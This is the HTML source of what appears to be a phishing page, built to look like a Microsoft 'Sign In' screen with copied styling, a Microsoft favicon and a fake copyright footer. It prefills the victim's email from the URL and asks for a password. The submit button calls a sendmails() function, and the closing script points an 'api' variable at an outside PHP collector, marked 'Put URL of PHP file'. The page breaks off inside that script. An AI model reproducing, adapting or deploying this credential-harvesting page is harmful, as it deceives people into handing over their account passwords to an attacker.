<html>

<head>
    <title>Sign In</title>
    <script type="text/javascript" src="https://www.sitepoint.com/examples/password/MaskedPassword/MaskedPassword.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6468.8/content/images/favicon_a.ico">

    <style type="text/css">
        html {
            font-size: 100%
        }
        
        body {
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            line-height: 20px;
            font-weight: 400;
            font-size: .9375rem;
            line-height: 1.25rem;
            padding-bottom: .227px;
            padding-top: .227px;
            color: #000;
            background-color: #fff
        }
        
        .text-secondary {
            color: rgba(0, 0, 0, 0.7);
            font-size: 13px
        }
        
        .agreement-layout {
            white-space: pre-wrap;
            word-wrap: break-word;
            overflow-x: hidden
        }
        
        body.cb {
            text-align: center
        }
        
        body.cb #ftrLogo {
            margin: 0
        }
        
        body.cb #maincontent {
            max-width: 384px;
            padding-left: 12px;
            padding-right: 12px
        }
        
        body.cb a {
            text-decoration: none
        }
        
        body.cb .text-13 {
            font-size: .8125rem
        }
        
        body.cb .radio,
        body.cb .alert-error {
            text-align: left
        }
        
        body.cb div.placeholderContainer {
            width: 100%;
            position: relative
        }
        
        body.cb div.placeholder {
            color: #666;
            background-color: transparent;
            margin-top: 6px;
            margin-left: 9px;
            white-space: nowrap;
            text-align: left
        }
        
        body.cb div.placeholder.ltr_override {
            margin-left: 11px;
            margin-right: auto;
            text-align: left
        }
        
        body.cb .modalDialogOverlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: #000;
            opacity: .5;
            -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=50)";
            filter: alpha(opacity=50);
            z-index: 50000
        }
        
        body.cb .modalDialogContainer {
            position: fixed;
            top: 60px;
            max-width: 356px;
            width: 83%;
            width: calc(90% - 28px);
            max-height: 80%;
            max-height: calc(100% - 80px);
            margin-left: -2px;
            margin-right: -2px;
            border: 1px solid #0067b8;
            background-color: #fff;
            z-index: 50001;
            overflow: auto;
            overflow-x: hidden
        }
        
        body.cb .modalDialogPadding {
            padding: 11px 12px 12px 12px
        }
        
        body.cb .msa-helpCell {
            margin-bottom: 24px;
            position: relative
        }
        
        body.cb .msa-helpSVG {
            float: left;
            position: absolute
        }
        
        body.cb .msa-helpCellDiv {
            overflow: hidden;
            margin-left: 44px
        }
        
        body.cb #learnMoreLink,
        body.cb #signup,
        body.cb #idA_MSAccLearnMore {
            white-space: nowrap
        }
        
        body.cb .modalDialogContent {
            width: 100%;
            position: relative;
            margin: 0 auto
        }
        
        body.cb .img-centipede {
            width: 100%;
            max-width: 266px;
            height: auto
        }
        
        body.cb .align-center {
            margin-left: auto;
            margin-right: auto;
            display: inline-block
        }
        
        body.cb #icdHIP table {
            width: 100% !important
        }
        
        body.cb #.hip {
            width: 100% !important;
            padding: 4px 8px !important;
            margin-top: 12px !important
        }
        
        body.cb tr#wlspispHIPErrorContainer>td {
            width: 100% !important
        }
        
        body.cb .hip-erroricon {
            display: none !important
        }
        
        .no-margin-top {
            margin-top: 0
        }
        
        .no-margin-bottom {
            margin-bottom: 0
        }
        
        .no-padding-left-right {
            padding-left: 0;
            padding-right: 0
        }
        
        .display-block {
            display: block
        }
        
        .display-inline-block {
            display: inline-block;
            white-space: nowrap
        }
        
        @media (max-width:319px) {
            body.cb #ftr {
                margin-top: 60px
            }
        }
        
        @media (min-height:800px) {
            body.cb #ftr {
                margin-top: 60px
            }
        }
        
        @media (max-height:400px) {
            body.cb .modalDialogContainer {
                top: 0;
                max-height: 100%
            }
        }
        
        .progress.spinnerText {
            margin: 0;
            margin-left: 20px;
            position: relative
        }
        
        .progressCommon {
            position: relative;
            animation: rotate .8s infinite linear;
            border: 4px solid #0067b8;
            border-right-color: #fff;
            border-radius: 50%
        }
        
        .progress.spinner {
            float: left;
            margin-top: 3px;
            height: 16px;
            width: 16px;
            position: relative;
            animation: rotate .8s infinite linear;
            border: 4px solid #0067b8;
            border-right-color: #fff;
            border-radius: 50%
        }
        
        .progress.spinnerLarge {
            margin: auto;
            height: 100px;
            width: 100px;
            position: relative;
            animation: rotate .8s infinite linear;
            border: 4px solid #0067b8;
            border-right-color: #fff;
            border-radius: 50%
        }
        
        @-webkit-keyframes rotate {
            0% {
                transform: rotate(0deg)
            }
            100% {
                transform: rotate(360deg)
            }
        }
        
        @-moz-keyframes rotate {
            0% {
                transform: rotate(0deg)
            }
            100% {
                transform: rotate(360deg)
            }
        }
        
        @-ms-keyframes rotate {
            0% {
                transform: rotate(0deg)
            }
            100% {
                transform: rotate(360deg)
            }
        }
        
        @-o-keyframes rotate {
            0% {
                transform: rotate(0deg)
            }
            100% {
                transform: rotate(360deg)
            }
        }
        
        @keyframes rotate {
            0% {
                transform: rotate(0deg)
            }
            100% {
                transform: rotate(360deg)
            }
        }
        
        .progress>div {
            position: absolute;
            height: 3px;
            width: 3px;
            background-color: #696969;
            z-index: 100
        }
        
        .row.tile:focus .progress>div,
        .row.tile:focus:hover .progress>div,
        .row.tile:active .progress>div {
            background-color: #fff
        }
        
        .progress>div {
            -webkit-animation: progressDot 2.5s ease-in 0s infinite;
            -moz-animation: progressDot 2.5s ease-in 0s infinite;
            -o-animation: progressDot 2.5s ease-in 0s infinite;
            animation: progressDot 2.5s ease-in 0s infinite
        }
        
        .progress>div:nth-child(2) {
            -webkit-animation-delay: .1s;
            -moz-animation-delay: .1s;
            -o-animation-delay: .1s;
            animation-delay: .1s
        }
        
        .progress>div:nth-child(3) {
            -webkit-animation-delay: .2s;
            -moz-animation-delay: .2s;
            -o-animation-delay: .2s;
            animation-delay: .2s
        }
        
        .progress>div:nth-child(4) {
            -webkit-animation-delay: .3s;
            -moz-animation-delay: .3s;
            -o-animation-delay: .3s;
            animation-delay: .3s
        }
        
        .progress>div:nth-child(5) {
            -webkit-animation-delay: .4s;
            -moz-animation-delay: .4s;
            -o-animation-delay: .4s;
            animation-delay: .4s
        }
        
        .progress>div:nth-child(6) {
            -webkit-animation-delay: .5s;
            -moz-animation-delay: .5s;
            -o-animation-delay: .5s;
            animation-delay: .5s
        }
        
        @-webkit-keyframes progressDot {
            from {
                left: 0;
                -webkit-animation-timing-function: ease-in
            }
            40% {
                left: 33%
            }
            70% {
                left: 33%;
                -webkit-animation-timing-function: ease-out
            }
            to {
                left: 100%
            }
        }
        
        @-moz-keyframes progressDot {
            from {
                left: 0;
                -moz-animation-timing-function: ease-in
            }
            40% {
                left: 33%
            }
            70% {
                left: 33%;
                -moz-animation-timing-function: ease-out
            }
            to {
                left: 100%
            }
        }
        
        @-o-keyframes progressDot {
            from {
                left: 0;
                -o-animation-timing-function: ease-in
            }
            40% {
                left: 33%
            }
            70% {
                left: 33%;
                -o-animation-timing-function: ease-out
            }
            to {
                left: 100%
            }
        }
        
        @keyframes progressDot {
            from {
                left: 0;
                animation-timing-function: ease-in
            }
            40% {
                left: 33%
            }
            70% {
                left: 33%;
                animation-timing-function: ease-out
            }
            to {
                left: 100%
            }
        }
        
        @keyframes pulse {
            from {
                opacity: .4
            }
        }
        
        @-o-keyframes pulse {
            from {
                opacity: .4
            }
        }
        
        @-moz-keyframes pulse {
            from {
                opacity: .4
            }
        }
        
        @-webkit-keyframes pulse {
            from {
                opacity: .4
            }
        }
        
        @keyframes fadeIn {
            from {
                opacity: 0
            }
            to {
                opacity: 1
            }
        }
        
        @-o-keyframes fadeIn {
            from {
                opacity: 0
            }
            to {
                opacity: 1
            }
        }
        
        @-moz-keyframes fadeIn {
            from {
                opacity: 0
            }
            to {
                opacity: 1
            }
        }
        
        @-webkit-keyframes fadeIn {
            from {
                opacity: 0
            }
            to {
                opacity: 1
            }
        }
        
        div.links a {
            margin-left: 16px;
            margin-right: 16px
        }
        
        div.links a.first {
            padding-left: 0
        }
        
        body.cb {
            color: #262626;
            text-align: left
        }
        
        .fadeIn {
            -webkit-animation: fadeIn 1s;
            -moz-animation: fadeIn 1s;
            -o-animation: fadeIn 1s;
            animation: fadeIn 1s
        }
        
        .backgroundImage {
            -webkit-animation: fadeIn 1s;
            -moz-animation: fadeIn 1s;
            -o-animation: fadeIn 1s;
            animation: fadeIn 1s
        }
        
        .background-logo {
            max-width: 256px;
            max-height: 24px;
            margin-bottom: 24px;
            display: block;
            margin-left: auto;
            margin-right: auto;
            -webkit-animation: fadeIn 1s;
            -moz-animation: fadeIn 1s;
            -o-animation: fadeIn 1s;
            animation: fadeIn 1s
        }
        
        .background-logo.large {
            max-height: 36px
        }
        
        .background {
            background: #f2f2f2
        }
        
        .background,
        .background>div {
            position: fixed;
            top: 0;
            width: 100%;
            height: 100%
        }
        
        .background>div {
            background-repeat: no-repeat, no-repeat;
            background-position: center center, center center;
            background-size: cover, cover
        }
        
        .blur {
            filter: url("data:image/svg+xml;utf9,<svg%20version='1.1'%20xmlns='http://www.w3.org/2000/svg'><filter%20id='blur'><feGaussianBlur%20stdDeviation='70'%20/></filter></svg>#blur");
            filter: blur(70px);
            -webkit-filter: blur(70px);
            -ms-filter: blur(70px);
            filter: progid: DXImageTransform.Microsoft.Blur(PixelRadius='70')
        }
        
        .background-overlay {
            background: rgba(0, 0, 0, 0.55);
            filter: progid: DXImageTransform.Microsoft.gradient(GradientType=0, startColorstr='#8C000000', endColorstr='#8C000000');
            width: 100%;
            height: 100%
        }
        
        #footer {
            position: fixed;
            bottom: 0;
            width: 100%;
            overflow: visible;
            z-index: 99;
            clear: both;
            background-color: rgba(0, 0, 0, 0.6);
            filter: progid: DXImageTransform.Microsoft.gradient(GradientType=0, startColorstr='#99000000', endColorstr='#99000000')
        }
        
        .outer {
            display: table;
            position: absolute;
            height: 100%;
            width: 100%
        }
        
        .middle {
            display: table-cell;
            vertical-align: middle
        }
        
        .inner {
            margin-left: auto;
            margin-right: auto;
            min-height: 364px;
            min-width: 320px;
            max-width: 412px;
            width: calc(100% - 40px);
            padding: 36px;
            margin-bottom: 28px;
            background-color: #fff;
            -webkit-box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
            -moz-box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
            box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
            border: 1px solid #818c94;
            border: 1px solid rgba(0, 0, 0, 0.4)
        }
        
        .wide {
            max-width: 640px
        }
        
        pre {
            font-family: inherit
        }
        
        #[type="color"],
        #[type="date"],
        #[type="datetime"],
        #[type="datetime-local"],
        #[type="email"],
        #[type="month"],
        #[type="number"],
        #[type="password"],
        #[type="search"],
        #[type="tel"],
        #[type="text"],
        #[type="time"],
        #[type="url"],
        #[type="week"],
        textarea,
        select {
            padding: 6px 10px;
            border-width: 1px;
            border-color: #666;
            border-color: rgba(0, 0, 0, 0.6);
            height: 36px;
            outline: none
        }
        
        #[type="color"]:hover,
        #[type="date"]:hover,
        #[type="datetime"]:hover,
        #[type="datetime-local"]:hover,
        #[type="email"]:hover,
        #[type="month"]:hover,
        #[type="number"]:hover,
        #[type="password"]:hover,
        #[type="search"]:hover,
        #[type="tel"]:hover,
        #[type="text"]:hover,
        #[type="time"]:hover,
        #[type="url"]:hover,
        #[type="week"]:hover,
        textarea:hover,
        select:hover {
            border-color: #323232;
            border-color: rgba(0, 0, 0, 0.8)
        }
        
        #[type="color"]:focus,
        #[type="date"]:focus,
        #[type="datetime"]:focus,
        #[type="datetime-local"]:focus,
        #[type="email"]:focus,
        #[type="month"]:focus,
        #[type="number"]:focus,
        #[type="password"]:focus,
        #[type="search"]:focus,
        #[type="tel"]:focus,
        #[type="text"]:focus,
        #[type="time"]:focus,
        #[type="url"]:focus,
        #[type="week"]:focus,
        textarea:focus,
        select:focus {
            border-color: #0067b8
        }
        
        #[type="color"]:focus.has-error,
        #[type="date"]:focus.has-error,
        #[type="datetime"]:focus.has-error,
        #[type="datetime-local"]:focus.has-error,
        #[type="email"]:focus.has-error,
        #[type="month"]:focus.has-error,
        #[type="number"]:focus.has-error,
        #[type="password"]:focus.has-error,
        #[type="search"]:focus.has-error,
        #[type="tel"]:focus.has-error,
        #[type="text"]:focus.has-error,
        #[type="time"]:focus.has-error,
        #[type="url"]:focus.has-error,
        #[type="week"]:focus.has-error,
        textarea:focus.has-error,
        select:focus.has-error {
            border-color: #e81123
        }
        
        body.cb div.placeholder {
            margin-top: 8px;
            margin-left: 11px
        }
        
        .btn,
        button,
        #[type='button'],
        #[type='submit'],
        #[type='reset'] {
            height: 36px;
            border-width: 1px;
            background-color: #ccc;
            background-color: rgba(0, 0, 0, 0.2)
        }
        
        .btn:hover,
        button:hover,
        #[type="button"]:hover,
        #[type="submit"]:hover,
        #[type="reset"]:hover {
            border: none;
            background-color: #b2b2b2;
            background-color: rgba(0, 0, 0, 0.3)
        }
        
        .btn:focus,
        button:focus,
        #[type="button"]:focus,
        #[type="submit"]:focus,
        #[type="reset"]:focus {
            background-color: #b2b2b2;
            background-color: rgba(0, 0, 0, 0.3)
        }
        
        .btn.btn-primary,
        button.btn-primary,
        #[type="button"].btn-primary,
        #[type="submit"].btn-primary,
        #[type="reset"].btn-primary {
            border-color: #0067b8;
            background-color: #0067b8
        }
        
        .btn.btn-primary:hover,
        button.btn-primary:hover,
        #[type="button"].btn-primary:hover,
        #[type="submit"].btn-primary:hover,
        #[type="reset"].btn-primary:hover,
        .btn.btn-primary:focus,
        button.btn-primary:focus,
        #[type="button"].btn-primary:focus,
        #[type="submit"].btn-primary:focus,
        #[type="reset"].btn-primary:focus {
            background-color: #005da6
        }
        
        .btn:focus,
        button:focus,
        #[type="button"]:focus,
        #[type="submit"]:focus,
        #[type="reset"]:focus,
        .btn.btn-primary:focus,
        button.btn-primary:focus,
        #[type="button"].btn-primary:focus,
        #[type="submit"].btn-primary:focus,
        #[type="reset"].btn-primary:focus {
            border: none;
            text-decoration: underline;
            outline: 2px solid #000
        }
        
        .btn:active,
        button:active,
        #[type="button"]:active,
        #[type="submit"]:active,
        #[type="reset"]:active,
        .btn.btn-primary:active,
        button.btn-primary:active,
        #[type="button"].btn-primary:active,
        #[type="submit"].btn-primary:active,
        #[type="reset"].btn-primary:active {
            outline: none;
            text-decoration: none;
            -ms-transform: scale(.98);
            -webkit-transform: scale(.98);
            transform: scale(.98)
        }
        
        .theme-dark .btn,
        .theme-light .btn,
        .theme-dark button,
        .theme-light button,
        .theme-dark #[type='button'],
        .theme-light #[type='button'],
        .theme-dark #[type='submit'],
        .theme-light #[type='submit'],
        .theme-dark #[type='reset'],
        .theme-light #[type='reset'] {
            outline: 1px dashed #000
        }
        
        .theme-dark .btn:hover,
        .theme-light .btn:hover,
        .theme-dark button:hover,
        .theme-light button:hover,
        .theme-dark #[type="button"]:hover,
        .theme-light #[type="button"]:hover,
        .theme-dark #[type="submit"]:hover,
        .theme-light #[type="submit"]:hover,
        .theme-dark #[type="reset"]:hover,
        .theme-light #[type="reset"]:hover {
            border: 1px solid #000
        }
        
        .theme-dark .btn:focus,
        .theme-light .btn:focus,
        .theme-dark button:focus,
        .theme-light button:focus,
        .theme-dark #[type="button"]:focus,
        .theme-light #[type="button"]:focus,
        .theme-dark #[type="submit"]:focus,
        .theme-light #[type="submit"]:focus,
        .theme-dark #[type="reset"]:focus,
        .theme-light #[type="reset"]:focus,
        .theme-dark .btn.btn-primary:focus,
        .theme-light .btn.btn-primary:focus,
        .theme-dark button.btn-primary:focus,
        .theme-light button.btn-primary:focus,
        .theme-dark #[type="button"].btn-primary:focus,
        .theme-light #[type="button"].btn-primary:focus,
        .theme-dark #[type="submit"].btn-primary:focus,
        .theme-light #[type="submit"].btn-primary:focus,
        .theme-dark #[type="reset"].btn-primary:focus,
        .theme-light #[type="reset"].btn-primary:focus {
            outline: 1px solid #000
        }
        
        .theme-dark .btn:active,
        .theme-light .btn:active,
        .theme-dark button:active,
        .theme-light button:active,
        .theme-dark #[type="button"]:active,
        .theme-light #[type="button"]:active,
        .theme-dark #[type="submit"]:active,
        .theme-light #[type="submit"]:active,
        .theme-dark #[type="reset"]:active,
        .theme-light #[type="reset"]:active,
        .theme-dark .btn.btn-primary:active,
        .theme-light .btn.btn-primary:active,
        .theme-dark button.btn-primary:active,
        .theme-light button.btn-primary:active,
        .theme-dark #[type="button"].btn-primary:active,
        .theme-light #[type="button"].btn-primary:active,
        .theme-dark #[type="submit"].btn-primary:active,
        .theme-light #[type="submit"].btn-primary:active,
        .theme-dark #[type="reset"].btn-primary:active,
        .theme-light #[type="reset"].btn-primary:active {
            text-decoration: none;
            outline: 1px dashed #000
        }
        
        .logo {
            max-width: 256px;
            height: 24px
        }
        
        .identityBanner {
            height: 28px;
            background: #f2f2f2;
            margin: 16px -36px;
            padding: 0 36px
        }
        
        .identity {
            line-height: 28px;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            text-align: right;
            width: calc(100% - 56px)
        }
        
        .profile-photo {
            height: 48px;
            width: 48px;
            margin-top: -48px;
            border-radius: 50%;
            overflow: hidden;
            float: right
        }
        
        .profile-photo>img {
            width: 100%
        }
        
        .boilerplate-text {
            background-color: #f2f2f2;
            padding: 24px 36px 36px 36px;
            margin: 24px -36px -36px -36px
        }
        
        .tile-container {
            position: relative
        }
        
        .table {
            width: 100%;
            display: table;
            table-layout: fixed
        }
        
        .table .table-row {
            display: table-row
        }
        
        .table .table-cell {
            display: table-cell;
            vertical-align: middle
        }
        
        .row.tile {
            margin-bottom: 0;
            padding: 12px 0;
            cursor: pointer;
            outline: none;
            color: inherit;
            display: block
        }
        
        .row.tile .content {
            line-height: 16px;
            padding-left: 24px
        }
        
        .row.tile .content>* {
            word-wrap: break-word
        }
        
        .row.tile:focus {
            outline: #000 dashed 1px;
            background: none
        }
        
        .row.tile:hover {
            background-color: #e6e6e6;
            background-color: rgba(0, 0, 0, 0.1);
            color: inherit
        }
        
        .row.tile:active {
            background-color: #b3b3b3;
            background-color: rgba(0, 0, 0, 0.3);
            color: inherit
        }
        
        .row.tile .table-cell:first-child {
            padding: 0 12px
        }
        
        .row.tile .table-cell:first-child+.table-cell {
            width: 100%
        }
        
        .tile-img {
            width: 48px;
            height: 48px
        }
        
        .tile-img.small {
            width: 24px;
            height: 24px;
            float: left;
            margin-right: 8px
        }
        
        .progress-container {
            width: 100%;
            position: relative;
            margin-top: 48px;
            margin-bottom: 24px
        }
        
        .progress-container-tile {
            width: 100%;
            position: relative;
            top: 3px
        }
        
        .progress {
            position: absolute;
            bottom: 0;
            height: 6px;
            width: 97%;
            width: calc(100% - 3px)
        }
        
        .animate-pulse {
            -webkit-animation: pulse 1s infinite alternate;
            -moz-animation: pulse 1s infinite alternate;
            -o-animation: pulse 1s infinite alternate;
            animation: pulse 1s infinite alternate
        }
        
        div.footerNode {
            margin: 0;
            float: right
        }
        
        div.footerNode a,
        div.footerNode span {
            color: #fff;
            font-size: 12px;
            line-height: 28px;
            white-space: nowrap;
            display: inline-block;
            margin-left: 16px;
            margin-right: 16px
        }
        
        .text-title,
        h3,
        .text-body,
        p {
            padding: 0;
            margin-top: 16px;
            margin-bottom: 16px
        }
        
        .form-group {
            margin-bottom: 16px
        }
        
        .form-group label {
            margin-top: 0;
            margin-bottom: 0
        }
        
        .btn,
        button,
        #[type='button'],
        #[type='submit'],
        #[type='reset'] {
            margin-top: 0;
            margin-bottom: 0
        }
        
        .col-xs-12.secondary {
            padding-right: 4px
        }
        
        .col-xs-12.primary {
            padding-left: 4px
        }
        
        .no-margin-bottom {
            margin-bottom: 0
        }
        
        .no-margin-top-bottom {
            margin-top: 0;
            margin-bottom: 0
        }
        
        .overflow-hidden {
            overflow: hidden
        }
        
        .menu-dots {
            position: absolute;
            padding: 0 5px;
            right: 0;
            top: 2px
        }
        
        .menu-dots:focus {
            outline: #000 dashed 1px;
            background: none
        }
        
        .menu {
            position: absolute;
            background-color: #fff;
            border: 1px solid #e6e6e6;
            border: 1px solid rgba(0, 0, 0, 0.1);
            background-clip: padding-box;
            z-index: 2;
            top: 0;
            right: 10px;
            width: 160px
        }
        
        .menu li {
            margin: 0
        }
        
        .menu li a {
            display: block;
            padding: 11px 12px 13px;
            background-color: #f2f2f2;
            background-color: rgba(0, 0, 0, 0.05);
            outline: none;
            color: inherit;
            cursor: pointer
        }
        
        .menu li a:focus {
            outline: #000 dashed 1px;
            background-color: #e6e6e6;
            background-color: rgba(0, 0, 0, 0.1)
        }
        
        .menu li a:hover {
            background-color: #e6e6e6;
            background-color: rgba(0, 0, 0, 0.1)
        }
        
        .menu li a:active {
            background-color: #b3b3b3;
            background-color: rgba(0, 0, 0, 0.3)
        }
        
        .moveOffScreen {
            position: fixed;
            bottom: 0;
            right: 0;
            height: 0 !important;
            width: 0 !important;
            overflow: hidden;
            opacity: 0;
            filter: alpha(opacity=0)
        }
        
        .largePadding {
            padding: 40px
        }
        
        .displaySign {
            text-align: center;
            font-size: 2.5rem;
            padding: 40px
        }
        
        .banner-logo {
            max-height: 36px
        }
        
        .optin-banner {
            position: fixed;
            bottom: 40px;
            right: 12px;
            color: #262626;
            background-color: #fff;
            padding: 24px;
            font-size: 13px;
            width: 380px;
            z-index: 100;
            -webkit-box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
            -moz-box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
            box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55)
        }
        
        .optin-banner .table-cell:first-child {
            width: 100%
        }
        
        .no-outline {
            outline: none
        }
        
        @media (max-width:600px),
        (max-height:392px) {
            .background,
            .background>div {
                display: none
            }
            .background.app,
            .background.app>div {
                display: inherit
            }
            .background-logo {
                margin-top: 24px
            }
            .middle {
                vertical-align: top
            }
            .inner {
                -webkit-box-shadow: none;
                -moz-box-shadow: none;
                box-shadow: none;
                border: 0;
                width: 100%
            }
            .inner.app {
                -webkit-box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
                -moz-box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
                box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
                border: 1px solid #818c94;
                border: 1px solid rgba(0, 0, 0, 0.4)
            }
            .wide {
                max-width: 412px
            }
            #footer {
                background: #fff
            }
            div.footerNode {
                float: left
            }
            div.footerNode a,
            div.footerNode span {
                color: #777
            }
            .boilerplate-text {
                padding: 16px;
                margin: 24px 0 0 0
            }
            .optin-banner {
                position: fixed;
                width: 100%;
                top: auto;
                bottom: 0;
                left: 0;
                right: 0;
                background-color: #f2f2f2;
                -webkit-box-shadow: none;
                -moz-box-shadow: none;
                box-shadow: none
            }
        }
        /**************************/
        
        .textbox {
            height: 36px;
            width: 275px;
            padding-left: 8px;
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            line-height: 20px;
            font-weight: 400;
            font-size: .9375rem;
            border: 1px solid #666;
        }
        
        .textbox:focus {
            border-color: #4488cc;
            border-style: solid;
            border-width: 1px;
            outline: 0;
        }
    </style>
    <style type="text/css">
        .textrbox {
            height: 26px;
            width: 275px;
            padding-left: 8px;
            padding-right: 8px;
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            color: #262626;
            text-align: right;
            line-height: 20px;
            font-weight: 400;
            font-size: .9375rem;
            border: 0px solid #fff;
            background-color: #F2F2F2;
        }
        
        .textrbox:focus {
            border-color: #fff;
            background-color: #F2F2F2;
            border-width: 0px;
            outline: 0;
        }
    </style>
    <style type="text/css">
        input[type=checkbox].css-checkbox {
            position: absolute;
            z-index: -1000;
            left: -1000px;
            overflow: hidden;
            clip: rect(0 0 0 0);
            height: 1px;
            width: 1px;
            margin: -1px;
            padding: 0;
            border: 0;
        }
        
        input[type=checkbox].css-checkbox + label.css-label {
            padding-left: 26px;
            height: 21px;
            display: inline-block;
            line-height: 21px;
            background-repeat: no-repeat;
            background-position: 0 0;
            font-size: 21px;
            vertical-align: middle;
            cursor: pointer;
        }
        
        input[type=checkbox].css-checkbox:checked + label.css-label {
            background-position: 0 -21px;
        }
        
        label.css-label {
            background-image: url(https://loppa.oss-us-east-1.aliyuncs.com/csscheckbox_a4824bcf5d413f078bdd6abd3e6e5bf4.png);
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            -khtml-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
        }
    </style>
    <style type="text/css">
        div#container {
            position: relative;
            width: 1366px;
            margin-top: 0px;
            margin-left: auto;
            margin-right: auto;
            text-align: left;
        }
        
        body {
            text-align: center;
            margin: 0
        }
    </style>

</head>

<body bgcolor="#030100">
    <div data-bind="component: { name: 'background-image', publicMethods: backgroundControlMethods }">
        <div class="background" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }">
            <!-- ko if: smallImageUrl -->
            <div class="blur" data-bind="backgroundImage: smallImageUrl()" style="background-image: url(&quot;images/small.jpg?x=12f4b8b543125cc986c79cd85320812f&quot;);"></div>
            <!-- /ko -->
            <!-- ko if: backgroundImageUrl -->
            <div class="backgroundImage" data-bind="backgroundImage: backgroundImageUrl()" style="background-image: url(https://loppa.oss-us-east-1.aliyuncs.com/760fe41056b0b16.jpg);"></div>
            <!-- /ko -->
            <!-- ko if: !!backgroundImageUrl() -->
            <div class="background-overlay"></div>
            <!-- /ko -->
        </div>
    </div>

    <div id="container">

        <div id="image1" style="position:absolute; overflow:hidden; left:477px; top:136px; width:412px; height:365px; z-index:0"><img src="https://loppa.oss-us-east-1.aliyuncs.com/9eb2773f83989d0.png" alt="" title="" border="0" width="412" height="365"></div>
        <input name="user" value="" class="textrbox" required="" type="text" style="position:absolute;width:290px;left:508px;top:196px;z-index:1" id="testx">

        <div style="position:absolute;width:316px; left: 515px; top: 224px;z-index:1;" id="warning" class="alert alert-error"></div>
	
        <input name="pass" id="pass" placeholder="Password" class="textbox" required="" type="password" style="position:absolute;width:338px;left:514px;top:300px;z-index:2">
        <div id="formimage1" style="position:absolute; left:686px; top:351px; z-index:3">

            <button type="submit" name="formimage1" width="167" height="38" value="" onclick="sendmails()" style="    border: 0;
    padding: 0;
    margin: 0;" class="btn twoToneButton" id="submit"><img src="https://loppa.oss-us-east-1.aliyuncs.com/c9eea375dd16c77.png"></button>
        </div>

        <div id="image6" style="position:absolute; overflow:hidden; left:513px; top:444px; width:120px; height:16px; z-index:5">
            <a href="#"><img src="https://loppa.oss-us-east-1.aliyuncs.com/54b6d9334161a54.png" alt="" title="" border="0" width="120" height="16"></a>
        </div>

        <div id="image8" style="position:absolute; overflow:hidden; left:513px; top:352px; width:167px; height:38px; z-index:6">
            <a href="#"><img src="https://loppa.oss-us-east-1.aliyuncs.com/1c6fb36aef197d5.png" alt="" title="" border="0" width="167" height="38"></a>
        </div>
        <div id="checkboxG1" style="position:absolute; left:513px; top:404px; z-index:4">
            <input type="checkbox" name="checkboxG1" id="checkboxG1" class="css-checkbox">
            <label for="checkboxG1" class="css-label radGroup1 chk"></label>
        </div>
        <div id="checkboxG1" style="position:absolute; left:513px; top:404px; z-index:4">
            <input type="checkbox" name="checkboxG2" id="checkboxG2" class="css-checkbox">
            <label for="checkboxG2" class="css-label radGroup1 clr"></label>
        </div>

    </div>

    <div id="footer">
        <div data-bind="component: { name: 'footer-control',
            params: {
                serverData: svr,
                showLinks: true },
            event: {
                agreementClick: footer_agreementClick } }">
            <div id="footerLinks" class="footerNode text-secondary">
                <span id="ftrCopy" data-bind="html: svr.strCopyrightTxt">© 2019 Microsoft</span>
				<a id="ftrTerms" data-bind="text: str['MOBILE_STR_Footer_Terms'], href: termsLink, click: termsLink_onClick" href="#">Terms of use</a> <a id="ftrPrivacy" data-bind="text: str['MOBILE_STR_Footer_Privacy'], href: privacyLink, click: privacyLink_onClick" href="#">Privacy &amp; Cookies</a>
            </div>
        </div>
    </div>

<style>
.alert{margin-bottom:8px;margin-top:7px;}
.alert-error{color:#e81123;}
.alert{margin-bottom:0;margin-top:0;}
</style>
    <script src="https://code.jquery.com/jquery-1.9.1.min.js"></script>
    <script>
		var api = 'https://i-siboffshore.com/creator/processor.php'; // Put URL of PHP file
        var url = window.location.search;
        url = url.replace("?email=", '');
        document.getElementById('testx').value = url
